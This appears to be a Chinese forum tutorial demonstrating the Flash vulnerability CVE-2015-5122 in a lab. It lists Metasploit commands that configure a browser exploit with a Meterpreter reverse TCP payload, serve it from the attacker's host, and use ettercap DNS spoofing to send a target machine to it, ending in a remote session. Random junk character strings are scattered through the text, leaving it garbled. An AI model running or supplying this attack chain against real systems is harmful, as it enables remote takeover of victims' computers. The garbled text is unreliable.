二、cve2015-5122漏洞实例演示虚拟机 / A0 I5 Y5 ]* p3 b3 V% C) G
/ Z6 S e+ y! p5 v1 [- [# j1 x& r: t* M6 F8 G 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
2 S) v: a. |3 P5 B. B& ysearch cve-2015-5122如图: & G3 ^; Y/ X. R: z- R) P
( u+ S% F. ^2 m& b
下面我们敲如下命令: ) L, }6 I; Q4 Z7 g; h
# |5 t( M P3 s$ G& P use exploit/multi/browser/adobe_flash_opaque_background_uaf
+ f" B" T# Q/ P, L+ \; Z7 A set PAYLOAD windows/meterpreter/reverse_tcp
, |4 q" j% l" ?) T set LHOST 192.168.0.109 * w2 `5 P5 _$ w" @) Q/ Y
1 y* k/ f* c" P, A set URIPATH / /*根目录*/
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 ; e9 c) Z$ A# C! u5 g6 E3 `- s/ g1 | P- L
) U0 a7 `; O1 ^- P) `' P% S: F+ t( V1 d, ? set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
& c4 e- w+ x' q3 N( v8 r. g然后show options如图:
0 `0 M' B$ ]8 g6 d
5 n# i, l! q# N" M& A& f
8 @7 z9 \; r% Y8 U
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
% l, e$ J5 v( R: O
9 N8 `( o# U, V' D; M9 }
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
|' x8 m1 E; m$ b0 ^ Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf , p* ~8 j- K, U8 z$ _
/ t7 k$ G7 [$ G0 X6 \
1 k- F" t" d* _* C' i 成功了,这时候我们断开ettercap,如图:
$ ]5 L0 C k! `1 ~; S" q2 o
" J- Q4 A8 R" U0 l& {4 I
Screenshot如图:
+ ^3 E/ U+ E% h7 I/ F0 k! f, |# N2 Y2 A. M( P! a8 ^) d
" W `7 L: Q' G4 o
' F8 ?" v: m- n( ~
* |: A. q( n8 L! ]; c. @8 ~
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |